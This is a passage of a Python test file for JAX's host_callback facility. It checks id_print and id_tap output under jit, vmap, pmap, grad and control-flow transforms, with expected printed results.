return hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
logging.info("%s: %s", self._testMethodName,
api.make_jaxpr(func)(1))
logging.info("%s: %s", self._testMethodName,
api.xla_computation(func)(1).as_hlo_text())
self.assertEqual(2, api.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2""", testing_stream.output)
testing_stream.reset()
def test_tap_jit2(self):
"""A sequence of JIT."""
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
return x2
self.assertEqual(2, api.jit(func)(1))
self.assertEqual(11, api.jit(func)(10))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: 1
10
where: 2
11""", testing_stream.output)
testing_stream.reset()
def test_tap_jit_result_unused(self):
"""We can id_print even if we don't use the result."""
def func(x):
hcb.id_print(x, where="1", output_stream=testing_stream)
hcb.id_print(x + 1, where="2", output_stream=testing_stream)
return x + 1
self.assertEqual(2, api.jit(func)(1))
self.assertEqual(11, api.jit(func)(10))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: 1
10
where: 2
11""", testing_stream.output)
testing_stream.reset()
def test_tap_jit_nested(self):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
def func_nested(x):
x2 = hcb.id_print(x + 1, where="nested", output_stream=testing_stream)
return x2
x3 = api.jit(func_nested)(x1)
return hcb.id_print(x3 + 1, where="3", output_stream=testing_stream)
self.assertEqual(3, api.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: nested
2
where: 3
3""", testing_stream.output)
testing_stream.reset()
def test_tap_jit_devices(self):
"""Running on multiple devices."""
logging.info(f"{self._testMethodName}: has devices {devices()}")
def func(x, device_id):
x1 = hcb.id_print(x, dev=str(device_id), output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, dev=str(device_id), output_stream=testing_stream)
return x2
for d in devices():
self.assertEqual(112, api.jit(func, device=d, static_argnums=1)(111, d.id))
hcb.barrier_wait()
logging.info(f"{self._testMethodName}: found output {testing_stream.output}")
self.assertEqual(len(devices()), len(re.findall(r"111", testing_stream.output)))
self.assertEqual(len(devices()), len(re.findall(r"112", testing_stream.output)))
testing_stream.reset()
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_pytree(self, with_jit=False):
def func(x, what=""):
"""Returns some pytrees depending on x"""
if what == "pair_1_x":
return (1, x)
elif what == "pair_x_2x":
return (x, 2 * x)
elif what == "dict":
return dict(a=2 * x, b=3 * x)
else:
assert False
tap_count = 0
def tap_func(a, _, *, what=""):
nonlocal tap_count
tap_count += 1
self.assertEqual(func(5, what), a)
transform = api.jit if with_jit else lambda f: f
for what in ("pair_1_x", "pair_x_2x", "dict"):
transformed = transform(
lambda x: hcb.id_tap(
partial(tap_func, what=what),
func(x, what),
result=func(x * 2, what))
)(5)
self.assertEqual(func(10, what), transformed)
hcb.barrier_wait() # Wait for receivers to be done
self.assertEqual(3, tap_count)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_concurrent_{concurrent}",
concurrent=concurrent)
for concurrent in [True, False]))
def test_tap_multiple(self, concurrent=False):
"""Call id_tap multiple times, concurrently or in sequence. """
if concurrent and jtu.device_under_test() in ["cpu", "gpu"]:
# TODO(necula): if there is device side concurrency, outfeeds from
# different computations can be interleaved. For example, it seems that
# on GPU if multiple host threads run a jit computation, the multiple
# computations are interleaved on the GPU. This can result in the outfeed
# trains being interleaved, which will trigger an error.
# The solution is to fix on GPU the receiving logic so that we can outfeed
# the train as one tuple, and receive it one piece as a time. Then the
# trains should be atomic.
# See also b/160692602.
raise SkipTest("concurrent id_tap not supported on CPU or GPU")
received = set()
count = 5
def pause_tap(idx, _):
received.add(int(idx))
logging.info(f"Starting do_tap {idx}. Sleeping 1sec ...")
time.sleep(0.3)
logging.info(f"Finish do_tap {idx}")
def do_tap(idx):
api.jit(lambda idx: hcb.id_tap(pause_tap, idx))(idx)
if concurrent:
threads = [
threading.Thread(
name=f"enqueue_tap_{idx}", target=do_tap, args=(idx,))
for idx in range(count)
]
[t.start() for t in threads]
[t.join() for t in threads]
else:
for idx in range(count):
do_tap(idx)
hcb.barrier_wait()
self.assertEqual(received, set(range(count)))
# TODO(necula): see comment for test_multiple_tap.
@jtu.skip_on_devices("cpu", "gpu")
def test_tap_multiple_barriers(self):
"""Call barrier_wait concurrently."""
def pause_tap(*args, **kwargs):
logging.info("pause_tap waiting")
time.sleep(0.3)
logging.info("pause_tap done")
def long_run(x):
return hcb.id_tap(pause_tap, x)
api.jit(long_run)(5.)
def try_barrier(idx):
logging.info(f"Starting test barrier {idx}")
hcb.barrier_wait()
logging.info(f"Finished test barrier {idx}")
threads = [
threading.Thread(
name=f"barrier_{idx}", target=try_barrier, args=(idx,))
for idx in range(3)
]
[t.start() for t in threads]
[t.join() for t in threads]
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_cond(self, with_jit=False):
"""A conditional"""
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="cond_t",
output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="cond_f", result=x,
output_stream=testing_stream),
x2 + 1)
x5 = hcb.id_print(x4 + 1, where="end", output_stream=testing_stream)
return x5
transform = api.jit if with_jit else lambda f: f
self.assertEqual(4, transform(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: cond_f
-1
where: end
4""", testing_stream.output)
testing_stream.reset()
@parameterized.named_parameters(
jtu.cases_from_list(
dict(testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_while_cond(self, with_jit=False):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
def body(x):
x3 = hcb.id_print(x, where="w_b_1", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="w_b_t",
output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="w_b_f",
result=x, output_stream=testing_stream),
x3 + 1)
return hcb.id_print(x4, where="w_b_2", output_stream=testing_stream)
x10 = lax.while_loop(lambda x: x <= 3, body, x2)
res = hcb.id_print(x10, where="end", output_stream=testing_stream)
return res
transform = api.jit if with_jit else lambda f: f
self.assertEqual(4, transform(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: w_b_1
2
where: w_b_t
3
where: w_b_2
3
where: w_b_1
3
where: w_b_f
-1
where: w_b_2
4
where: end
4""", testing_stream.output)
testing_stream.reset()
def test_tap_jit_while_pred_tap(self):
"""While with printing in the conditional."""
def func(x):
x1 = hcb.id_print(x, where="1")
x10 = lax.while_loop(lambda x: hcb.id_print(x < 3,
where="w_p",
output_stream=testing_stream),
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x10, where="3", output_stream=testing_stream)
return res
self.assertEqual(3, api.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self,
"""
where: w_p
True
where: w_b
2
where: w_p
True
where: w_b
3
where: w_p
False
where: 3
3""", testing_stream.output)
testing_stream.reset()
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_scan_cond(self, with_jit=True):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
def body(c, x):
x3 = hcb.id_print(x, where="s_1", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="s_t", output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="s_f", result=x, output_stream=testing_stream),
x3 + 1)
return (c, hcb.id_print(x4, where="s_2", output_stream=testing_stream))
_, x10 = lax.scan(body, x2, jnp.arange(3))
res = hcb.id_print(x10, where="10", output_stream=testing_stream)
return res
if with_jit:
func = api.jit(func)
res = func(1)
self.assertAllClose(jnp.array([1, 2, 3]), res)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: s_1
0
where: s_t
1
where: s_2
1
where: s_1
1
where: s_f
-1
where: s_2
2
where: s_1
2
where: s_t
3
where: s_2
3
where: 10
[1 2 3]""", testing_stream.output)
testing_stream.reset()
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_shape_{shape}_dtype_{dtype}_nr_args={nr_args}",
shape=shape,
dtype=dtype,
nr_args=nr_args) for nr_args in [1, 2]
for shape in [(), (2,), (2, 3), (2, 3, 4)]
for dtype in jtu.dtypes.all))
def test_tap_jit_types(self, nr_args=2, dtype=jnp.int16, shape=(2,)):
if dtype in (jnp.complex64, jnp.complex128, jnp.bool_):
raise SkipTest(f"id_print jit not implemented for {dtype}.")
args = [jnp.arange(np.prod(shape), dtype=dtype).reshape(shape)]
if nr_args > 1:
args = args * nr_args
jit_fun1 = api.jit(lambda xs: hcb.id_print(
xs,
a_new_test="************",
testcase_name=f"shape_{shape}_dtype_{dtype}_nr_args={nr_args}"))
res = jit_fun1(args)
self.assertAllClose(args, res)
def test_tap_jit_large(self):
arg = jnp.arange(10000, dtype=jnp.int32).reshape((10, 10, 5, -1))
api.jit(hcb.id_print)(arg)
def test_tap_jit_several_together(self):
arg = jnp.arange(50, dtype=jnp.int32).reshape((10, 5))
api.jit(lambda x, y: hcb.id_print((x, y, x * 2.)))(arg, jnp.ones(100, dtype=jnp.int32))
def test_tap_jit_interleaving(self):
# Several jit's without data dependencies; they may interfere
count = 0 # Count tap invocations
nr_arrays = 5
def tap_func(arg, _):
nonlocal count
assert len(arg) == nr_arrays
count += 1
# This is the function that we'll run multiple times
def func(x, count):
for i in range(count):
x = hcb.id_tap(tap_func, [x + i for i in range(nr_arrays)])[-1]
return x
x = jnp.array(1, dtype=np.int32)
res = 0
for _ in range(10):
# No dependencies between the jit invocations
res += api.jit(lambda x: func(x, 10))(x)
hcb.barrier_wait()
self.assertEqual(100, count)
def test_tap_jit_tap_exception(self):
# Simulate a tap error
def tap_err(*args, **kwargs):
raise NotImplementedError
def func(x):
x1 = hcb.id_print(x + 1, what="x1", output_stream=testing_stream)
x2 = hcb.id_tap(tap_err, x1 + 1)
x3 = hcb.id_print(x2 + 1, what="x3", output_stream=testing_stream)
return x3
res = api.jit(func)(0) # No error yet
with self.assertRaises(hcb.CallbackException):
hcb.barrier_wait()
# Even though the receiver thread raised, the main thread should still
# return 3.
self.assertEqual(3, res)
# We should have received all others
assertMultiLineStrippedEqual(self, """
what: x1
1
what: x3
3""", testing_stream.output)
testing_stream.reset()
def test_tap_while(self):
"""Executing while, even without JIT uses compiled code"""
y = jnp.ones(5) # captured const
def func(x):
return lax.while_loop(
lambda c: c[1] < 5,
lambda c: (y, hcb.id_print(c[1], output_stream=testing_stream) + 1),
(x, 1))
func(y)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
1
2
3
4""", testing_stream.output)
testing_stream.reset()
def test_tap_jvp(self):
jvp_fun1 = lambda x, xt: api.jvp(fun1, (x,), (xt,))
res_primals, res_tangents = jvp_fun1(jnp.float32(5.), jnp.float32(0.1))
self.assertAllClose(100., res_primals, check_dtypes=False)
self.assertAllClose(4., res_tangents, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: ['jvp'] what: a * 2
( 10.00
0.20 )
transforms: ['jvp'] what: y * 3
( 30.00
0.60 )""", testing_stream.output)
testing_stream.reset()
def test_tap_grad_primal_unused(self):
# The output of id_print is not needed for backwards pass
def func(x):
return 2. * hcb.id_print(x * 3., what="x * 3",
output_stream=testing_stream)
grad_func = api.grad(func)
arg = jnp.float32(5.)
jaxpr = str(api.make_jaxpr(grad_func)(arg))
# making the Jaxpr does not print anything
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
{ lambda ; a.
let b = mul a 3.00
c = outside_call[ arg_treedef=*
callback=...
identity=True
transforms=( ) ] b
_ = mul c 2.00
d = mul 1.00 2.00
e = outside_call[ arg_treedef=*
callback=...
identity=True
transforms=(('jvp',), ('transpose',)) ] d
f = mul e 3.00
in (f,) }""", jaxpr)
assertMultiLineStrippedEqual(self, "", testing_stream.output)
testing_stream.reset()
res_grad = grad_func(arg)
hcb.barrier_wait()
self.assertAllClose(6., res_grad, check_dtypes=False)
assertMultiLineStrippedEqual(self, """
what: x * 3
15.00
transforms: ['jvp', 'transpose'] what: x * 3
2.00""", testing_stream.output)
testing_stream.reset()
def test_tap_grad_simple(self):
def func(x):
y = hcb.id_print(x * 2., what="x * 2", output_stream=testing_stream)
return x * hcb.id_print(y * 3., what="y * 3",
output_stream=testing_stream)
grad_func = api.grad(func)
res_grad = grad_func(jnp.float32(5.))
self.assertAllClose(2. * 5. * 6., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
what: y * 3
30.00
transforms: ['jvp', 'transpose'] what: y * 3
5.00
transforms: ['jvp', 'transpose'] what: x * 2
15.00""", testing_stream.output)
testing_stream.reset()
def test_tap_grad_grad(self):
def func(x):
y = hcb.id_print(x * 2., what="x * 2", output_stream=testing_stream)
return x * (y * 3.)
grad_func = api.grad(api.grad(func))
# making the Jaxpr does not print anything
_ = api.make_jaxpr(grad_func)(5.)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "", testing_stream.output)
res_grad = grad_func(jnp.float32(5.))
self.assertAllClose(12., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
transforms: ['jvp', 'transpose'] what: x * 2
15.00
transforms: ['jvp', 'transpose'] what: x * 2
3.00
transforms: ['jvp', 'transpose', 'jvp', 'transpose'] what: x * 2
2.00""", testing_stream.output)
testing_stream.reset()
def test_tap_grad_pytree(self):
def func(x):
x4, x5 = hcb.id_print((x * 2., x * 3.), what="pair",
result=(x * 4., x * 5.),
output_stream=testing_stream)
return x4 + 2. * x5
x = jnp.float32(5.)
grad_func = api.grad(func)
print(api.make_jaxpr(grad_func)(x))
res_grad = grad_func(x)
self.assertAllClose(14., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: pair
( 10.00
15.00 )
transforms: ['jvp', 'transpose'] what: pair
( 0.00
0.00 )""", testing_stream.output)
testing_stream.reset()
def test_tap_jvp_float0(self):
def f(x, yint):
x, yint = hcb.id_tap(lambda arg, _: arg, (x, yint))
return x * yint
res = api.jvp(f, (2., 3), (0.2, np.zeros((), dtypes.float0)))
self.assertAllClose((6., 0.6), res)
def test_tap_grad_float0(self):
def func(x, yint):
x, yint = hcb.id_print((x, yint), what="pair", output_stream=testing_stream)
return x * yint
grad_func = api.grad(func)
res_grad = grad_func(jnp.float32(5.), jnp.int32(2))
self.assertAllClose(2., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: pair
( 5.00
2 )
transforms: ['jvp', 'transpose'] what: pair
( 2.00
False )""", testing_stream.output)
testing_stream.reset()
def test_tap_vmap(self):
vmap_fun1 = api.vmap(fun1)
vargs = jnp.array([jnp.float32(4.), jnp.float32(5.)])
vmap_fun1(vargs)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] what: a * 2
[ 8.00 10.00]
transforms: [('batch', {'batch_dims': (0,)})] what: y * 3
[24.00 30.00]""", testing_stream.output)
testing_stream.reset()
def test_tap_vmap_not_batched(self):
x = 3.
def func(y):
# x is not mapped, y is mapped
_, y = hcb.id_print((x, y), output_stream=testing_stream)
return x + y
vmap_func = api.vmap(func)
vargs = jnp.array([jnp.float32(4.), jnp.float32(5.)])
_ = vmap_func(vargs)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (None, 0)})]
( 3.00
[4.00 5.00] )""", testing_stream.output)
testing_stream.reset()
def test_tap_vmap_vmap(self):
# A 2D tensor with x[i, j] = i + j using 2 vmap
def sum(x, y):
return hcb.id_print(x + y, output_stream=testing_stream)
def sum_rows(xv, y):
return api.vmap(sum, in_axes=(0, None))(xv, y)
def sum_all(xv, yv):
return api.vmap(sum_rows, in_axes=(None, 0))(xv, yv)
xv = jnp.arange(5, dtype=np.int32)
yv = jnp.arange(3, dtype=np.int32)
# assertMultiLineStrippedEqual(self, "", str(api.make_jaxpr(sum_all)(xv, yv)))
_ = sum_all(xv, yv)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)}), ('batch', {'batch_dims': (0,)})]
[[0 1 2 3 4]
[1 2 3 4 5]
[2 3 4 5 6]]""", testing_stream.output)
testing_stream.reset()
def test_tap_vmap_while(self):
"""Vmap of while."""
def func(x):
# like max(x, 2)
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = lax.while_loop(lambda x: x < 2,
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x2, where="3", output_stream=testing_stream)
return res
inputs = np.arange(5, dtype=np.int32)
self.assertAllClose(np.array([2, 2, 2, 3, 4]), api.jit(api.vmap(func))(inputs),
check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] where: 1
[0 1 2 3 4]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[1 2 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[2 3 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: 3
[2 2 2 3 4]""", testing_stream.output)
testing_stream.reset()
def test_tap_vmap_while_tap_cond(self):
"""Vmap of while, with a tap in the conditional."""
def func(x):
# like max(x, 2)
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = lax.while_loop(lambda x: hcb.id_print(x < 2, where="w_c",
output_stream=testing_stream),
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x2, where="3", output_stream=testing_stream)
return res
inputs = np.arange(5, dtype=np.int32)
res = api.jit(api.vmap(func))(inputs)
hcb.barrier_wait()
self.assertAllClose(np.array([2, 2, 2, 3, 4]), res, check_dtypes=False)
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] where: 1
[0 1 2 3 4]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[ True True False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[1 2 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[ True False False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[2 3 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[False False False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: 3
[2 2 2 3 4]""", testing_stream.output)
testing_stream.reset()
def test_tap_transforms(self):
def power(x, n):
x, n = hcb.id_print((x, n), output_stream=testing_stream)
return x * x * n * x
def f(x, n):
return x * power(x + 1., n)
x = 3.
print("impl = ", f(x, 2.))
hcb.barrier_wait()
expected = """
( 4.
2. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print("jvp = ", api.jvp(lambda x: f(x, 2.), (x,), (1.,)))
hcb.barrier_wait()
expected = """
transforms: ['jvp']
( ( 4.
2. )
( 1.
0. ) )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print("grad = ", api.grad(f)(x, 2.))
hcb.barrier_wait()
expected = """
( 4.
2. )
transforms: ['jvp', 'transpose']
( 288.
192. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
xv = np.array([3., 4.])
print("vmap o grad = ", api.vmap(api.grad(f))(xv, np.array([2., 3.])))
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})]
( [4. 5.]
[2. 3.] )
transforms: ['jvp', 'transpose', ('batch', {'batch_dims': (0, 0)})]
( [288. 900.]
[192. 500.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
def test_tap_pmap(self):
xv = jnp.arange(len(devices()), dtype=jnp.int32)
def fun1(x, do_print=False): # x: i32
return maybe_print(do_print, x * 2, "x * 2", tap_with_device=True)
pmap_fun1 = api.pmap(partial(fun1, do_print=True), devices=devices())
res = pmap_fun1(xv)
hcb.barrier_wait()
expected_res = api.pmap(partial(fun1, do_print=False),
devices=devices())(xv)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: x * 2
0
device: cpu:1 what: x * 2
2""")
testing_stream.reset()
def test_tap_pmap_vmap(self):
# A matrix M[ij] = i * 10 + j
nr_devices = len(devices())
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.int32)
def fun1(x, do_print=False): # x: i32
return maybe_print(do_print, x * 2, "x * 2", tap_with_device=True)
pmap_vmap_fun1 = api.pmap(api.vmap(partial(fun1, do_print=True)),
devices=devices())
res = pmap_vmap_fun1(matrix)
hcb.barrier_wait()
expected_res = api.pmap(api.vmap(partial(fun1, do_print=False)),
devices=devices())(matrix)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[0.00 2.00 4.00]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[20.00 22.00 24.00]""")
testing_stream.reset()
def test_tap_pmap_pmap_vmap(self):
  """id_print under pmap-of-pmap-of-vmap; needs an even device count."""
  # An array M[ijk] = 100 * i + 10 * j + k
  nr_devices = len(devices())
  if nr_devices % 2 != 0:
    raise SkipTest("test works only on even number of devices")
  shape = (2, nr_devices // 2, 3)
  matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
                           dtype=np.float32)

  def fun1(x, do_print=False):  # x: f32
    y = maybe_print(do_print, x * 2., "x * 2", tap_with_device=True)
    return y ** 2

  pmap_fun1 = api.pmap(api.pmap(api.vmap(partial(fun1, do_print=True))),
                       devices=devices())
  res = pmap_fun1(matrix)
  hcb.barrier_wait()
  expected_res = api.pmap(api.pmap(api.vmap(partial(fun1, do_print=False))),
                          devices=devices())(matrix)
  self.assertAllClose(expected_res, res, check_dtypes=False)
  # Assertion text is for 2 devices (also works for 1 device)
  assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[0.00 2.00 4.00]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[200.00 202.00 204.00]""")
  testing_stream.reset()
@ignore_jit_of_pmap_warning()
def test_tap_pmap_pmap_extra(self):
  """pmap of a pmap surrounded by extra code."""
  # An array M[ijk] = 100 * i + 10 * j + k
  nr_devices = len(devices())
  if nr_devices != 2:
    raise SkipTest("test works only on 2 devices")
  shape = (2, 1, 3)
  matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
                           dtype=np.float32)

  def fun(xv, do_print=False):
    # This will be printed on all devices, with shape [1, 3]
    xv = maybe_print(do_print, xv + 1., "before", tap_with_device=True)
    res = api.pmap(lambda x: maybe_print(do_print, x * 2., "inside", tap_with_device=True))(xv)
    # This will be printed on all devices, with shape [1, 3]
    return maybe_print(do_print, res + 1., "after", tap_with_device=True)

  res = api.pmap(partial(fun, do_print=True))(matrix)
  self.assertAllClose(fun(matrix, do_print=False), res, check_dtypes=False)
  hcb.barrier_wait()
  # Assertion text is for 2 devices (also works for 1 device)
  assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[1.00 2.00 3.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[3.00 5.00 7.00]]
device: cpu:1 what: before
[[101.00 102.00 103.00]]
device: cpu:1 what: inside
[202.00 204.00 206.00]
device: cpu:1 what: after
[[203.00 205.00 207.00]]""")
  testing_stream.reset()
def test_tap_jvp_pmap_vmap(self):
  """id_print under jvp-of-pmap-of-vmap: tap pairs primals with tangents."""
  # An array M[ijk] = 100 * i + 10 * j + k
  nr_devices = len(devices())
  shape = (nr_devices, 2, 3)
  matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
                           dtype=np.float32)

  def fun(xv, do_print=False):
    # x: f32[3]
    return api.jvp(api.pmap(api.vmap(lambda x: maybe_print(do_print, x * 2., "x * 2", tap_with_device=True))),
                   (xv,), (.1 * jnp.ones_like(xv),))

  res = fun(matrix, do_print=True)
  hcb.barrier_wait()
  expected_res = fun(matrix, do_print=False)
  self.assertAllClose(expected_res, res, check_dtypes=False)
  # Assertion text is for 2 devices (also works for 1 device)
  # Device 0 will get to execute api.jvp(api.vmap(...)) for matrix[0, :, :]
  assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)}), 'jvp'] what: x * 2
( [[ 0.00 2.00 4.00]
[20.00 22.00 24.00]]
[[0.20 0.20 0.20]
[0.20 0.20 0.20]] )
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)}), 'jvp'] what: x * 2
( [[200.00 202.00 204.00]
[220.00 222.00 224.00]]
[[0.20 0.20 0.20]
[0.20 0.20 0.20]] )""")
  testing_stream.reset()
def test_tap_vmap_pmap(self):
  """id_print under vmap-of-pmap: batch dimension spans the vmapped axis."""
  # An array M[ijk] = 100 * i + 10 * j + k
  nr_devices = len(devices())
  shape = (2, nr_devices, 3)
  matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
                           dtype=np.float32)

  def fun(xv, do_print=False):
    # x: f32[3]
    return api.vmap(api.pmap(lambda x: maybe_print(do_print, x * 2., "x * 2", tap_with_device=True)))(xv)

  res = fun(matrix, do_print=True)
  hcb.barrier_wait()
  expected_res = fun(matrix, do_print=False)
  self.assertAllClose(expected_res, res, check_dtypes=False)
  # Assertion text is for 2 devices (also works for 1 device)
  # Device 0 will get to execute the pmapped function for matrix[:, 0, :]
  assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 0.00 2.00 4.00]
[200.00 202.00 204.00]]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 20.00 22.00 24.00]
[220.00 222.00 224.00]]""")
  testing_stream.reset()
@ignore_jit_of_pmap_warning()
def test_tap_jit_pmap_extra(self):
  """jit of a pmap surrounded by extra code."""
  # A matrix M[ij] = i * 10 + j
  nr_devices = len(devices())
  # Fixed: was a bare `assert`, which is stripped under `python -O` and
  # reports an AssertionError instead of a skip. Sibling tests raise
  # SkipTest for unsupported device counts, so do the same here.
  if nr_devices not in (1, 2):
    raise SkipTest("test works only on 1 or 2 devices")
  shape = (nr_devices, 3)
  matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
                           dtype=np.float32)

  def fun(xv, do_print=False):
    # This will be printed on all devices with shape (nr_devices, 3)
    xv = maybe_print(do_print, xv + 1., "before", tap_with_device=True)
    res = api.pmap(lambda x: maybe_print(do_print, x * 2., "inside", tap_with_device=True))(xv)
    # This will be printed on all devices with shape (nr_devices, 3)
    return maybe_print(do_print, res + 1., "after", tap_with_device=True)

  res = api.jit(partial(fun, do_print=True))(matrix)
  self.assertAllClose(fun(matrix, do_print=False), res, check_dtypes=False)
  hcb.barrier_wait()
  if len(devices()) == 2:
    assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[ 1.00 2.00 3.00]
[11.00 12.00 13.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[ 3.00 5.00 7.00]
[23.00 25.00 27.00]]
device: cpu:1 what: before
[[ 1.00 2.00 3.00]
[11.00 12.00 13.00]]
device: cpu:1 what: inside
[22.00 24.00 26.00]
device: cpu:1 what: after
[[ 3.00 5.00 7.00]
[23.00 25.00 27.00]]""")
  else:
    assert len(devices()) == 1
    assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[1.00 2.00 3.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[3.00 5.00 7.00]]""")
  testing_stream.reset()
def test_tap_cond_pmap(self):
  """id_print under cond-of-pmap (currently unsupported in JAX)."""
  raise SkipTest("cond of pmap does not work in JAX. Issue #5178.")
  # A matrix M[ij] = i * 10 + j
  nr_devices = len(devices())
  shape = (nr_devices, 3)
  matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
                           dtype=np.float32)

  def fun1(x, do_print=False):
    return maybe_print(do_print, x * 2., "x * 2")

  def fun2(cond, xv, do_print=False):
    return lax.cond(cond, api.pmap(partial(fun1, do_print=do_print)),
                    lambda xv: xv, xv)

  # Bug fix: the exercised call previously used the default do_print=False,
  # so nothing was ever tapped and the comparison below was vacuous. The
  # exercised call must enable printing.
  res = fun2(True, matrix, do_print=True)
  self.assertAllClose(fun2(True, matrix, do_print=False), res, check_dtypes=False)
  hcb.barrier_wait()
  assertMultiLineStrippedEqual(self, """
